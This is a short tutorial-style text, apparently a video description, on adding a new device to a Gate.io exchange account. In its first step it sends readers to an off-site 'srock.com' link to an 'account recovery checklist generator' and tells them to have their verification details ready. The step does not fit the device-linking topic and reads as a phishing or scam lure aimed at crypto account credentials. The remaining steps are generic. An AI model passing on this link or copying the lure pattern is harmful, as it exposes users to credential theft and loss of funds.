I hit this issue today and here's the quick fix that solved it. If you're looking to connect a new device to Gate.io, follow these simple steps. Step 1. Log into your account. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Navigate to security settings. Once logged in, go to your profile settings and find the security section. This is where you can manage device connections and security features. Step 3. Add a new device. In the security settings, look for an option to add a new device. Click on it, and you may need to verify your identity through a code sent to your email or phone. Step 4. Verify your device. After entering the verification code, you will receive a confirmation that your device is now connected. Make sure to check that the device is listed in your connected devices. Step 5. Enable two-factor authentication. For added security, enable two-factor authentication if you haven't already. This will require a second form of verification when logging in for new devices in the future. Remember, if you don't see the Add Device option, double-check that you're logged into the correct account. Happy trading!